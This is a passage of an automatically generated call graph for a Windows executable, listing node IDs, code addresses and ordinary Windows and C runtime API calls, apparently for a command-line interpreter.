SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19253->19302 19255 1ed88 19255->19172 19257 348f0 GetSystemTime 19256->19257 19258 348fc 19256->19258 19259 3493b SystemTimeToFileTime 19257->19259 19258->19259 19260 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 19259->19260 19261 2bbc7 19260->19261 19261->19180 19263 187a5 GetLocaleInfoW 19262->19263 19263->19200 19265 199a0 19264->19265 19287 199d0 19264->19287 19266 19a11 6 API calls 19265->19266 19267 199a8 19266->19267 19287->19205 19301 19b1f 19300->19301 19301->19212 19302->19255 19304 1a9a2 SetEnvironmentVariableW GetProcessHeap RtlFreeHeap 19303->19304 19306 1a986 19303->19306 19305 1a9d4 5 API calls 19304->19305 19307 1a9c5 19305->19307 19306->19304 19307->18803 20253 1a8e6 20252->20253 20254 1cc70 549 API calls 20253->20254 20255 1a8f8 20254->20255 20256 280ba longjmp 20255->20256 20257 1a90c 20255->20257 20258 280c8 20256->20258 20298 1bab0 20257->20298 20311 1d660 EnterCriticalSection LeaveCriticalSection 20258->20311 20261 1a911 20261->18617 20262 280cd 20262->18617 20264 1cc7a 20263->20264 20265 1cf10 548 API calls 20264->20265 20266 1cc8a 20265->20266 20267 2d434 longjmp 20266->20267 20268 1cc9b 20266->20268 20267->20268 20269 19950 448 API calls 20268->20269 20270 1ccc4 20268->20270 20271 2d45b 20269->20271 20270->18622 20273 38996 20272->20273 20274 3898e 20272->20274 20275 389a2 20273->20275 20277 389b2 20273->20277 20278 389db 20274->20278 20279 389ce longjmp 20274->20279 20276 178e4 448 API calls 20275->20276 20276->20274 20277->20274 20280 178e4 448 API calls 20277->20280 20278->18616 20279->20278 20280->20274 20282 387a0 20281->20282 20283 38900 20282->20283 20284 38930 20282->20284 20286 388be 20282->20286 20288 19950 448 API calls 20282->20288 20295 3892e 20282->20295 20296 388d2 20282->20296 20297 38791 448 API calls 20282->20297 20285 19950 448 API calls 20283->20285 20287 19950 448 API calls 20284->20287 20290 3890f 20285->20290 20286->20283 20293 388c3 20286->20293 20287->20295 20288->20282 20291 19950 448 API calls 20290->20291 20294 38925 20290->20294 20291->20294 20293->20284 20293->20296 20869 3871d 20294->20869 20295->18621 20876 386e6 20296->20876 20297->20282 20302 1bb19 20298->20302 20310 1bac2 20298->20310 20299 1baf3 20304 1bb56 20299->20304 20396 1ccd0 20299->20396 20300 1badc _wcsicmp 20300->20299 20303 1bb68 20300->20303 20306 1cc70 549 API calls 20302->20306 20308 1bb48 20302->20308 20302->20310 20303->20299 20307 1cc70 549 API calls 20303->20307 20304->20261 20305 1bb15 20305->20261 20306->20302 20307->20303 20308->20304 20309 1cc70 549 API calls 20308->20309 20309->20310 20310->20299 20310->20300 20313 1d6b0 20311->20313 20312 2d587 20315 2d59b 20312->20315 20318 163bd 448 API calls 20312->20318 20313->20312 20314 1d6c6 EnterCriticalSection LeaveCriticalSection 20313->20314 20322 1d971 20313->20322 20316 1d6f5 _get_osfhandle SetFilePointer AcquireSRWLockShared ReadFile ReleaseSRWLockShared 20314->20316 20317 2d5a8 20314->20317 20712 3769e 20315->20712 20321 1d752 20316->20321 20745 39fcf _get_osfhandle GetFileType 20317->20745 20318->20315 20327 2d742 memcmp 20321->20327 20334 1d774 20321->20334 20347 1d81c 20321->20347 20322->20322 20690 1da30 20322->20690 20324 2d5be 20326 1dd98 6 API calls 20324->20326 20344 2d6bd 20324->20344 20325 1d980 20325->20262 20332 2d5cd 20326->20332 20327->20334 20328 2d6c6 _get_osfhandle 20331 345f9 10 API calls 20328->20331 20329 1d9f7 GetLastError 20339 1d82c 20329->20339 20330 1d7b2 20337 2d7e9 20330->20337 20338 1d7ec MultiByteToWideChar 20330->20338 20343 1d809 20330->20343 20331->20344 20333 2d5de 20332->20333 20332->20344 20333->20316 20340 1dd98 6 API calls 20333->20340 20334->20330 20335 2d78e AcquireSRWLockShared ReadFile ReleaseSRWLockShared 20334->20335 20341 1d7bd SetFilePointer 20334->20341 20335->20330 20335->20343 20336 2d6ef GetLastError 20336->20321 20336->20344 20346 2d7f0 EnterCriticalSection LeaveCriticalSection longjmp 20337->20346 20338->20343 20350 1dd98 6 API calls 20339->20350 20366 1d840 20339->20366 20345 2d5f2 20340->20345 20341->20330 20343->20346 20343->20347 20344->20321 20344->20328 20344->20336 20344->20339 20348 2d6b3 20345->20348 20351 2d607 20345->20351 20346->20339 20347->20329 20347->20339 20348->20316 20349 1d893 20349->20262 20352 2d826 20350->20352 20353 2d610 20351->20353 20354 2d61f EnterCriticalSection LeaveCriticalSection _get_osfhandle 20351->20354 20358 39922 448 API calls 20352->20358 20352->20366 20746 37613 _get_osfhandle 20353->20746 20356 34191 448 API calls 20354->20356 20357 2d665 20356->20357 20357->20329 20359 2d66d 20357->20359 20360 2d84f longjmp 20358->20360 20359->20339 20361 2d677 GetLastError 20359->20361 20360->20366 20364 2d689 20361->20364 20365 2d69e 20361->20365 20362 1d8d7 wcschr 20363 1d8f6 20362->20363 20362->20366 20370 1d9e3 20363->20370 20372 1d904 20363->20372 20367 19950 448 API calls 20364->20367 20368 19950 448 API calls 20365->20368 20366->20349 20366->20362 20366->20363 20371 2d68e longjmp 20367->20371 20368->20339 20369 2d908 20369->20262 20370->20322 20377 1d9eb 20370->20377 20371->20365 20372->20369 20374 1dd98 6 API calls 20372->20374 20373 2d8d3 20375 178e4 448 API calls 20373->20375 20378 1d945 20374->20378 20379 2d8df 20375->20379 20376 2d8af 20381 178e4 448 API calls 20376->20381 20377->20373 20377->20376 20380 3769e 459 API calls 20377->20380 20378->20322 20382 1d949 _get_osfhandle SetFilePointer 20378->20382 20383 2d8fb longjmp 20379->20383 20387 1dd98 6 API calls 20379->20387 20384 2d898 20380->20384 20385 2d8be 20381->20385 20382->20322 20393 2d915 20382->20393 20383->20369 20388 19950 448 API calls 20384->20388 20386 39922 448 API calls 20385->20386 20389 2d8c6 longjmp 20386->20389 20390 2d8f2 20387->20390 20391 2d8a2 20388->20391 20389->20373 20390->20383 20751 3a0da 20390->20751 20392 19950 448 API calls 20391->20392 20392->20376 20393->20322 20394 1998d 448 API calls 20393->20394 20394->20322 20397 1cd14 20396->20397 20398 1cce9 20396->20398 20439 1de30 20397->20439 20400 1ccf5 20398->20400 20401 1cde8 20398->20401 20403 1cd01 20400->20403 20404 1cdf2 20400->20404 20510 1e090 20401->20510 20405 1cd12 20403->20405 20436 1e230 20403->20436 20513 1e210 20404->20513 20406 1cddd 20405->20406 20455 1cf10 _setjmp3 20405->20455 20406->20305 20410 1cd48 20411 1cd59 20410->20411 20412 2d478 longjmp 20410->20412 20413 2d48f 20411->20413 20418 1cd85 20411->20418 20412->20413 20414 19950 448 API calls 20413->20414 20415 2d49f 20414->20415 20416 39922 448 API calls 20415->20416 20419 2d4ac longjmp 20416->20419 20417 1ce4a 20423 1cc70 549 API calls 20417->20423 20428 1ce61 20417->20428 20432 1ce6c 20417->20432 20418->20417 20420 1cdd2 20418->20420 20421 2d4ba 20419->20421 20422 1cf10 548 API calls 20420->20422 20424 19950 448 API calls 20421->20424 20422->20406 20423->20417 20425 2d4ca 20424->20425 20425->20305 20426 1dcd0 448 API calls 20427 1ce89 20426->20427 20427->20415 20429 1ce93 20427->20429 20430 1cf10 548 API calls 20428->20430 20431 1cc70 549 API calls 20429->20431 20430->20432 20433 1ceac 20431->20433 20432->20406 20432->20426 20434 1bab0 575 API calls 20433->20434 20435 1cec6 20433->20435 20434->20435 20435->20305 20437 1ccd0 577 API calls 20436->20437 20438 1e247 20437->20438 20438->20405 20516 1ded0 20439->20516 20441 1de4a 20442 1de52 20441->20442 20443 2da16 20441->20443 20534 1e0b0 20442->20534 20445 1cc70 549 API calls 20443->20445 20448 1de57 20445->20448 20446 1de64 20447 1cc70 549 API calls 20446->20447 20453 1de92 20446->20453 20449 1de75 20447->20449 20448->20446 20451 38959 449 API calls 20448->20451 20450 1ded0 555 API calls 20449->20450 20452 1de80 20450->20452 20451->20446 20452->20453 20454 1cf10 548 API calls 20452->20454 20453->20405 20454->20453 20456 2d56e 20455->20456 20460 1cf38 20455->20460 20457 1d03b 20458 1d048 20457->20458 20461 19950 448 API calls 20457->20461 20458->20410 20459 1cf9e 20463 1d600 533 API calls 20459->20463 20460->20456 20460->20457 20460->20459 20468 1cf86 wcschr 20460->20468 20504 1d0fa 20460->20504 20685 1d600 20460->20685 20462 2d4ca 20461->20462 20462->20410 20465 1cfb7 20463->20465 20467 2d4d2 20465->20467 20470 1cfc7 20465->20470 20466 1cf67 iswspace 20466->20460 20469 1d600 533 API calls 20467->20469 20467->20504 20468->20459 20468->20460 20471 2d4ea 20469->20471 20472 1cfe2 iswdigit 20470->20472 20475 1d0a6 20470->20475 20480 1d4a7 20470->20480 20470->20504 20481 1d600 533 API calls 20471->20481 20474 1cfff 20472->20474 20477 1d341 20472->20477 20473 1d600 533 API calls 20473->20504 20483 1d600 533 API calls 20474->20483 20492 1d027 20474->20492 20475->20477 20484 1d0b5 iswspace 20475->20484 20485 1d0e8 iswdigit 20475->20485 20476 1d218 20476->20410 20477->20472 20478 1d600 533 API calls 20477->20478 20477->20504 20478->20477 20479 1d190 20479->20476 20482 178e4 448 API calls 20479->20482 20486 1d600 533 API calls 20480->20486 20481->20477 20482->20456 20491 1d2a5 20483->20491 20484->20472 20487 1d0c7 20484->20487 20488 1d310 20485->20488 20485->20504 20493 1d4ac 20486->20493 20490 1d0d0 wcschr 20487->20490 20487->20504 20488->20477 20489 1d328 iswspace 20488->20489 20489->20477 20495 1d484 20489->20495 20490->20472 20490->20485 20494 1d600 533 API calls 20491->20494 20499 1d2ae 20491->20499 20492->20410 20493->20457 20493->20471 20493->20472 20493->20504 20494->20499 20498 1a62f wcschr 20495->20498 20496 1d1b4 iswspace 20496->20479 20496->20504 20497 1d16d iswdigit 20497->20504 20498->20477 20499->20492 20501 1d600 533 API calls 20499->20501 20506 1a62f wcschr 20499->20506 20507 1d426 iswdigit 20499->20507 20500 1d23e iswspace 20503 1d253 wcschr 20500->20503 20500->20504 20505 1d405 iswspace 20501->20505 20502 1d1d1 wcschr 20502->20479 20502->20497 20503->20504 20504->20473 20504->20474 20504->20479 20504->20496 20504->20497 20504->20500 20504->20502 20505->20499 20506->20499 20507->20492 20508 1d438 20507->20508 20509 1d600 533 API calls 20508->20509 20509->20492 20511 1ccd0 577 API calls 20510->20511 20512 1e0a7 20511->20512 20512->20405 20514 1ccd0 577 API calls 20513->20514 20515 1e227 20514->20515 20515->20405 20520 1df00 20516->20520 20517 1dcd0 448 API calls 20517->20520 20518 1df16 iswdigit 20519 1df27 20518->20519 20518->20520 20523 1df2f 20519->20523 20524 1cf10 548 API calls 20519->20524 20520->20517 20520->20518 20520->20519 20521 1df63 iswdigit 20520->20521 20522 2daf9 longjmp 20520->20522 20525 1e26b 20520->20525 20526 2daec 20520->20526 20530 1e059 iswdigit 20520->20530 20531 38959 449 API calls 20520->20531 20532 1acb0 448 API calls 20520->20532 20533 1cc70 549 API calls 20520->20533 20608 1a931 20520->20608 20521->20520 20522->20525 20523->20441 20524->20523 20525->20441 20527 38959 449 API calls 20526->20527 20528 2daf1 20527->20528 20528->20522 20530->20520 20531->20520 20532->20520 20533->20520 20535 1e0c1 _wcsicmp 20534->20535 20536 1e15b 20534->20536 20537 1e203 _wcsicmp 20535->20537 20538 1e0dc _wcsicmp 20535->20538 20539 1e1db 20536->20539 20542 1dcd0 448 API calls 20536->20542 20545 22a35 20537->20545 20599 22a63 20537->20599 20538->20537 20540 1e0f7 _wcsicmp 20538->20540 20543 38959 449 API calls 20539->20543 20566 1e1e0 20539->20566 20540->20536 20544 1e112 _wcsicmp 20540->20544 20546 1e17d 20542->20546 20547 1e1f5 20543->20547 20544->20536 20548 1e12d _wcsicmp 20544->20548 20627 1bb90 20545->20627 20550 29ca7 20546->20550 20560 1e187 20546->20560 20547->20448 20548->20536 20552 1e144 _wcsicmp 20548->20552 20551 39922 448 API calls 20550->20551 20555 29cac longjmp 20551->20555 20552->20536 20553 22a47 20559 1cc70 549 API calls 20553->20559 20553->20599 20554 1e1bf 20558 1a8c4 563 API calls 20554->20558 20557 15e22 20555->20557 20556 1cc70 549 API calls 20556->20560 20561 29cc3 20557->20561 20565 15da6 448 API calls 20557->20565 20562 1e1c9 20558->20562 20563 22a5b 20559->20563 20560->20554 20560->20556 20564 1e1b4 20560->20564 20561->20448 20562->20566 20570 1cc70 549 API calls 20562->20570 20644 19907 20563->20644 20568 1cf10 548 API calls 20564->20568 20569 15e31 20565->20569 20566->20448 20568->20554 20571 18f21 448 API calls 20569->20571 20570->20539 20572 15e3a 20571->20572 20578 15e1d 20572->20578 20587 38c50 448 API calls 20572->20587 20573 22ae4 20576 2f500 20573->20576 20577 22af4 iswspace 20573->20577 20574 22a7c _wcsicmp 20575 22a92 _wcsicmp 20574->20575 20574->20599 20579 22aa8 _wcsicmp 20575->20579 20575->20599 20580 38959 449 API calls 20576->20580 20577->20576 20581 22b0b 20577->20581 20578->20448 20582 22abe _wcsicmp 20579->20582 20579->20599 20583 22b81 20580->20583 20586 1a62f wcschr 20581->20586 20595 22ad7 20582->20595 20582->20599 20590 38959 449 API calls 20583->20590 20607 22b8c 20583->20607 20584 1dcd0 448 API calls 20584->20599 20585 1cc70 549 API calls 20585->20599 20588 22b1f 20586->20588 20596 15e68 20587->20596 20588->20576 20592 22b34 20588->20592 20589 2f4d2 20591 39922 448 API calls 20589->20591 20593 2f50f 20590->20593 20594 2f4d7 longjmp 20591->20594 20651 22c23 20592->20651 20593->20593 20594->20595 20595->20573 20601 38959 449 API calls 20595->20601 20596->20448 20598 38959 449 API calls 20598->20599 20599->20573 20599->20574 20599->20584 20599->20585 20599->20589 20599->20598 20600 22b4b 20655 233ca 20600->20655 20601->20573 20607->20448 20609 1cc70 549 API calls 20608->20609 20610 1a93b 20609->20610 20611 1a942 20610->20611 20612 38959 449 API calls 20610->20612 20613 1dcd0 448 API calls 20611->20613 20614 1a94f 20611->20614 20612->20611 20613->20614 20615 1a959 20614->20615 20616 39922 448 API calls 20614->20616 20615->20520 20617 29cac longjmp 20616->20617 20618 15e22 20617->20618 20619 29cc3 20618->20619 20620 15da6 448 API calls 20618->20620 20619->20520 20621 15e31 20620->20621 20622 18f21 448 API calls 20621->20622 20623 15e3a 20622->20623 20624 15e1d 20623->20624 20625 38c50 448 API calls 20623->20625 20624->20520 20626 15e68 20625->20626 20626->20520 20628 1dcd0 448 API calls 20627->20628 20629 1bba1 20628->20629 20631 1dcd0 448 API calls 20629->20631 20635 1bbc1 20629->20635 20630 39922 448 API calls 20632 29cac longjmp 20630->20632 20631->20635 20633 15e22 20632->20633 20634 29cc3 20633->20634 20636 15da6 448 API calls 20633->20636 20634->20553 20635->20630 20637 1bbde 20635->20637 20638 15e31 20636->20638 20637->20553 20639 18f21 448 API calls 20638->20639 20640 15e3a 20639->20640 20641 15e1d 20640->20641 20642 38c50 448 API calls 20640->20642 20641->20553 20643 15e68 20642->20643 20643->20553 20645 1bc30 448 API calls 20644->20645 20646 19938 20645->20646 20675 1a800 20646->20675 20649 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20650 1994e 20649->20650 20650->20599 20652 1cc70 549 API calls 20651->20652 20653 22c2f _wcsicmp 20652->20653 20654 22c41 20653->20654 20654->20600 20656 1cc70 549 API calls 20655->20656 20657 233e2 20656->20657 20658 2f776 20657->20658 20666 233eb 20657->20666 20659 38959 449 API calls 20658->20659 20660 2f77b 20659->20660 20661 1cc70 549 API calls 20661->20666 20662 23457 20666->20660 20666->20661 20666->20662 20667 1dd20 448 API calls 20666->20667 20668 1dcd0 448 API calls 20666->20668 20669 2f78c 20666->20669 20667->20666 20668->20666 20676 19943 20675->20676 20677 1a82f 20675->20677 20676->20649 20677->20676 20678 39a0e 449 API calls 20677->20678 20679 2c971 20678->20679 20679->20676 20680 163bd 448 API calls 20679->20680 20682 2c982 20680->20682 20682->20676 20686 1d613 20685->20686 20687 1d660 533 API calls 20686->20687 20689 1d627 20686->20689 20688 280cd 20687->20688 20688->20466 20689->20466 20691 1dcd0 448 API calls 20690->20691 20692 1da45 20691->20692 20693 2d948 memset longjmp 20692->20693 20707 1da52 20692->20707 20694 1da81 20693->20694 20694->20325 20695 1dad3 20696 1daf1 20695->20696 20697 2d9ad 20695->20697 20698 1dc60 2 API calls 20696->20698 20700 178e4 448 API calls 20697->20700 20699 1daf6 20698->20699 20699->20325 20701 2d9a8 20700->20701 20704 1dc60 2 API calls 20701->20704 20705 2d9cc longjmp 20704->20705 20706 2d9da 20705->20706 20708 178e4 448 API calls 20706->20708 20707->20694 20707->20695 20707->20697 20710 2d97b memcpy 20707->20710 20759 1ee03 20707->20759 20810 1bf70 20707->20810 20709 2d9e3 20708->20709 20709->20325 20711 178e4 448 API calls 20710->20711 20711->20701 20713 37728 20712->20713 20714 376fd 20712->20714 20716 37d26 20713->20716 20719 37746 20713->20719 20721 19950 448 API calls 20713->20721 20715 163bd 448 API calls 20714->20715 20718 37708 EnterCriticalSection LeaveCriticalSection 20715->20718 20717 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20716->20717 20720 37d3d 20717->20720 20718->20713 20722 1ec2e 448 API calls 20719->20722 20723 37750 20719->20723 20720->20317 20721->20719 20722->20723 20724 18e9e 448 API calls 20723->20724 20725 377ad 20724->20725 20864 37654 20725->20864 20728 37c99 20729 19abf _vsnwprintf 20728->20729 20730 37cba 20729->20730 20732 1998d 448 API calls 20730->20732 20731 378b8 towupper 20741 377fa 20731->20741 20733 37cfe 20732->20733 20733->20716 20734 37d07 EnterCriticalSection LeaveCriticalSection 20733->20734 20734->20716 20735 19310 448 API calls 20735->20741 20736 16854 448 API calls 20736->20741 20737 19abf _vsnwprintf 20737->20741 20738 14d08 5 API calls 20738->20741 20739 37afc GetDriveTypeW 20739->20741 20741->20730 20741->20731 20741->20735 20741->20736 20741->20737 20741->20738 20741->20739 20742 19abf _vsnwprintf 20741->20742 20743 272ef ApiSetQueryApiSetPresence 20741->20743 20868 2640a FormatMessageW 20741->20868 20744 379ed LocalFree 20742->20744 20743->20741 20744->20741 20745->20324 20747 34799 448 API calls 20746->20747 20748 3763c 20747->20748 20749 37649 GetLastError 20748->20749 20750 37645 20748->20750 20749->20750 20750->20339 20752 3a0ef GetStdHandle 20751->20752 20753 34799 448 API calls 20752->20753 20754 3a110 20753->20754 20755 3a114 wcschr 20754->20755 20756 3a129 20754->20756 20755->20752 20755->20756 20757 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20756->20757 20758 3a133 20757->20758 20758->20383 20760 1ee52 20759->20760 20761 1ee4c 20759->20761 20763 1ee5a wcsrchr 20760->20763 20765 1ee68 20760->20765 20761->20760 20762 1eea7 20761->20762 20766 21a05 5 API calls 20762->20766 20769 2de31 20762->20769 20763->20765 20764 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20768 1ee88 20764->20768 20765->20764 20799 1eed8 20766->20799 20767 2df50 longjmp 20767->20769 20768->20707 20769->20765 20769->20767 20770 2de49 ??_V@YAXPAX 20769->20770 20781 2decb 20769->20781 20770->20765 20771 1ef09 towlower wcsrchr 20774 1f1dd wcsrchr 20771->20774 20771->20799 20772 1ef50 wcsrchr 20775 1ef67 wcsrchr 20772->20775 20772->20799 20773 2de80 wcschr 20776 2df01 20773->20776 20777 2de9e 20773->20777 20779 1f1f7 towlower 20774->20779 20774->20799 20775->20776 20775->20799 20776->20770 20780 178e4 448 API calls 20776->20780 20778 1dcd0 448 API calls 20777->20778 20784 2deb5 20778->20784 20779->20799 20780->20769 20781->20770 20782 1acb0 448 API calls 20782->20799 20783 1efed 20783->20765 20785 1efef ??_V@YAXPAX 20783->20785 20784->20769 20833 21d90 20784->20833 20785->20765 20786 1efe6 20788 1acb0 448 API calls 20786->20788 20788->20783 20789 1f009 GetFullPathNameW 20789->20799 20791 1dc60 2 API calls 20791->20776 20792 2df72 SearchPathW 20792->20799 20793 20207 10 API calls 20794 1f03d wcsrchr 20793->20794 20795 2dfb9 wcsrchr 20794->20795 20794->20799 20795->20799 20796 1f067 memset 20797 1e3f0 17 API calls 20796->20797 20797->20799 20798 2dff6 GetFileAttributesExW 20798->20799 20799->20769 20799->20770 20799->20771 20799->20772 20799->20773 20799->20776 20799->20782 20799->20783 20799->20786 20799->20789 20799->20792 20799->20793 20799->20795 20799->20796 20799->20798 20800 2e07c FileTimeToSystemTime 20799->20800 20805 16854 448 API calls 20799->20805 20807 1f164 wcsrchr 20799->20807 20808 1f18a 20799->20808 20809 19310 448 API calls 20799->20809 20846 3b325 20799->20846 20800->20799 20801 1acb0 448 API calls 20802 1f1ba 20801->20802 20802->20783 20803 1f1c8 ??_V@YAXPAX 20802->20803 20803->20783 20804 2e271 20805->20799 20807->20799 20807->20804 20808->20801 20808->20804 20809->20799 20811 1dcd0 448 API calls 20810->20811 20814 1bfc8 20811->20814 20812 2cfad longjmp 20821 1c02c 20812->20821 20813 2cfc1 longjmp 20813->20821 20815 1dcd0 448 API calls 20814->20815 20814->20821 20832 1c155 20814->20832 20815->20821 20816 1ec2e 448 API calls 20816->20821 20818 1c1ef wcstol 20818->20821 20820 1c111 20822 2d029 20820->20822 20820->20832 20821->20812 20821->20813 20821->20816 20821->20818 20821->20820 20828 1c26d 20821->20828 20831 1c0bf 20821->20831 20821->20832 20826 178e4 448 API calls 20822->20826 20823 2d042 memcpy 20827 2d063 20823->20827 20824 1c333 memcpy 20825 1c1b2 _wcsnicmp 20824->20825 20825->20832 20829 2d036 longjmp 20826->20829 20830 1c27d wcstol 20828->20830 20828->20832 20829->20823 20830->20832 20859 1c3f4 20831->20859 20832->20823 20832->20824 20832->20825 20832->20831 20834 21e5a 20833->20834 20835 21da8 20833->20835 20834->20791 20835->20834 20854 1ab7f 20835->20854 20838 1acb0 448 API calls 20839 21dc2 20838->20839 20840 201f5 wcsrchr 20839->20840 20845 21dd1 20840->20845 20841 2f106 20842 21e4a 20844 1dc60 2 API calls 20842->20844 20843 21e11 _wcsnicmp 20843->20845 20844->20834 20845->20841 20845->20842 20845->20843 20845->20845 20849 3b35b __aulldvrm 20846->20849 20847 3b42e 20848 3b445 wcsncmp 20847->20848 20851 3b432 20847->20851 20848->20851 20849->20847 20850 3b3f4 memmove 20849->20850 20850->20849 20852 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20851->20852 20853 3b4f8 20852->20853 20853->20799 20855 1ab88 20854->20855 20858 1abaa 20854->20858 20856 1ab89 iswspace 20855->20856 20857 1ab98 wcschr 20855->20857 20855->20858 20856->20855 20856->20857 20857->20855 20857->20858 20858->20838 20860 1dc60 2 API calls 20859->20860 20861 1c3fb 20860->20861 20862 1dc60 2 API calls 20861->20862 20863 1c0df 20862->20863 20863->20707 20865 37660 20864->20865 20866 37679 20864->20866 20867 26e25 4 API calls 20865->20867 20866->20716 20866->20728 20866->20741 20867->20866 20868->20741 20870 38727 20869->20870 20875 38781 20869->20875 20871 1998d 448 API calls 20870->20871 20874 38736 20871->20874 20872 19950 448 API calls 20872->20874 20873 1998d 448 API calls 20873->20874 20874->20872 20874->20873 20874->20875 20877 19950 448 API calls 20876->20877 20878 386f9 20877->20878 20879 3871d 448 API calls 20878->20879 20880 38702 20879->20880 20881 38791 448 API calls 20880->20881 20882 3870d 20881->20882 20883 38791 448 API calls 20882->20883 20884 38718 20883->20884 20884->20295 20886 1adc6 20885->20886 20890 2cc3f 20885->20890 20887 25a2e memset 20886->20887 20889 1add1 20887->20889 20888 2cc6a GetLastError 20888->20890 20889->20890 20892 1e3f0 17 API calls 20889->20892 20890->20888 20891 178e4 448 API calls 20890->20891 20896 261e6 ??_V@YAXPAX 20890->20896 20891->20890 20893 1adef 20892->20893 20893->20890 20894 1ae05 20893->20894 20895 1b0b9 20893->20895 21136 1e950 memset 20894->21136 20898 20b12 5 API calls 20895->20898 20896->20890 20900 1b0c1 20898->20900 20900->20890 21265 17f47 memset 20900->21265 20901 1ae23 20901->20890 20905 2cc7c 20901->20905 20913 1ae44 20901->20913 20902 1b118 21279 221ee 20902->21279 20910 261e6 ??_V@YAXPAX 20905->20910 20907 1b11f 21283 22940 20907->21283 20908 1aea1 20908->20890 20924 1af6b 20908->20924 20930 1aecb wcschr 20908->20930 20937 1b13b 20908->20937 20938 1b176 20908->20938 20909 1b0dc towupper 20911 1b100 20909->20911 20910->20908 20911->20902 20911->20911 20915 2cc75 20911->20915 20913->20908 20914 1bc30 448 API calls 20913->20914 20916 1ae86 20914->20916 20917 39a7d 448 API calls 20915->20917 20920 1b00e wcsncmp 20916->20920 20922 1ae91 20916->20922 20917->20905 20920->20908 20920->20922 20921 261e6 ??_V@YAXPAX 20926 1afe8 20921->20926 20922->20908 20923 1a800 449 API calls 20922->20923 20923->20908 21165 1b1b0 20924->21165 20928 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20926->20928 20932 1b002 20928->20932 20929 20b12 5 API calls 20929->20937 20930->20908 20945 1b033 20930->20945 20931 1af83 20934 1afc4 20931->20934 20935 1af99 20931->20935 20932->18657 21187 1aa50 20934->21187 20939 1afa5 20935->20939 20940 1b02c 20935->20940 20937->20908 20937->20929 20937->20938 20946 17f47 23 API calls 20937->20946 20955 2ccc9 GetLastError 20937->20955 20944 178e4 448 API calls 20938->20944 20941 1afb1 20939->20941 20942 1b085 20939->20942 21197 1c6c0 20940->21197 20948 1b0a2 20941->20948 20949 1afbd 20941->20949 21250 19dc0 20942->21250 20944->20890 20945->20942 20951 1b193 20945->20951 20946->20937 20948->20907 20953 1b0aa 20948->20953 21184 19770 20949->21184 20950 1b031 20952 1afc2 20950->20952 20956 26c78 4 API calls 20951->20956 21193 1b17b 20952->21193 21169 159a0 20953->21169 20955->20938 20956->20938 20959 1e683 20958->20959 20960 1e6c6 20958->20960 20959->20960 20961 1e689 20959->20961 20964 1e71d 20959->20964 20965 1e6ec 20959->20965 20970 1e733 20959->20970 20960->18626 22131 1e790 20961->22131 20967 1e790 457 API calls 20964->20967 20965->20960 20969 1e790 457 API calls 20965->20969 20966 1e790 457 API calls 20971 1e6ad 20966->20971 20967->20970 20968 1e790 457 API calls 20968->20960 20969->20965 20970->20960 20970->20968 20971->20960 20972 1e790 457 API calls 20971->20972 20972->20971 20975 203cb 20973->20975 20974 203e1 20976 203f3 20974->20976 20977 20416 20974->20977 20975->20974 20978 2e7bf iswdigit 20975->20978 22145 215f0 20976->22145 20981 203f8 20977->20981 22149 22960 wcstol wcstol 20977->22149 20978->20975 20980 2e7e2 20978->20980 20983 178e4 448 API calls 20980->20983 20985 1e470 917 API calls 20981->20985 20984 2040d 20983->20984 20984->18657 20985->20984 20987 1e470 918 API calls 20986->20987 20988 1ab63 20987->20988 20989 1ab76 20988->20989 20990 1e470 918 API calls 20988->20990 20989->18657 20990->20989 20992 1e3f0 17 API calls 20991->20992 21004 19f61 20992->21004 20993 1a0d9 20995 1a0e7 ??_V@YAXPAX 20993->20995 20996 1a0ef 20993->20996 20994 19fd7 20999 1dcd0 448 API calls 20994->20999 21024 19ff4 20994->21024 20995->20996 20997 26b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20996->20997 20998 1a0fe 20997->20998 20998->18632 20998->18645 20999->21024 21000 20060 5 API calls 21000->21004 21002 2c376 _get_osfhandle SetFilePointer 21005 2c392 21002->21005 21002->21024 21003 1a02b _get_osfhandle 21007 1a03d _get_osfhandle 21003->21007 21003->21024 21004->20993 21004->20994 21004->21000 21008 19abf _vsnwprintf 21005->21008 21007->21024 21009 2c3a9 21008->21009 21014 178e4 448 API calls 21009->21014 21010 2c439 21012 19abf _vsnwprintf 21010->21012 21011 1a16c _close 21011->21024 21012->21009 21013 1dd98 6 API calls 21013->21024 21015 2c463 21014->21015 21018 1a125 2 API calls 21015->21018 21016 1a1d6 _dup2 21016->21024 21017 2c3d3 21020 21d90 451 API calls 21017->21020 21018->20993 21019 20590 19 API calls 21019->21024 21025 2c3dd 21020->21025 21021 2c40c 21022 1a1d6 _dup2 21021->21022 21027 2c42d 21022->21027 21023 1a11c 21029 1a125 2 API calls 21023->21029 21024->20993 21024->21002 21024->21003 21024->21010 21024->21011 21024->21013 21024->21016 21024->21017 21024->21019 21024->21021 21024->21023 21026 2c4aa 21024->21026 22154 1a1a8 _dup 21024->22154 22156 39fcf _get_osfhandle GetFileType 21024->22156 21025->21026 21032 2c3f2 SearchPathW 21025->21032 21028 1a125 2 API calls 21026->21028 21030 2c434 21027->21030 21031 2c475 21027->21031 21033 2c4af 21028->21033 21035 2c47f 21029->21035 21036 1a16c _close 21030->21036 21034 1a16c _close 21031->21034 21032->21021 21032->21026 21037 39edb 448 API calls 21033->21037 21034->21023 21038 19abf _vsnwprintf 21035->21038 21036->21010 21037->20993 21039 2c496 21038->21039 21040 178e4 448 API calls 21039->21040 21040->20993 21042 1e470 918 API calls 21041->21042 21043 203a2 21042->21043 21043->18657 21045 1dcd0 448 API calls 21044->21045 21046 20776 21045->21046 21047 2e9b9 21046->21047 21048 20792 21046->21048 21049 2089d 21046->21049 21053 1dd20 448 API calls 21048->21053 21050 1dcd0 448 API calls 21049->21050 21051 208a5 21050->21051 21052 1dcd0 448 API calls 21051->21052 21060 207de 21052->21060 21054 207b3 21053->21054 21055 207bb 21054->21055 21056 2e8bd 21054->21056 21057 1dd20 448 API calls 21055->21057 21058 1dc60 2 API calls 21056->21058 21059 207d6 21057->21059 21058->21059 21059->21060 21063 1dc60 2 API calls 21059->21063 21060->21047 21061 20812 21060->21061 21062 208c5 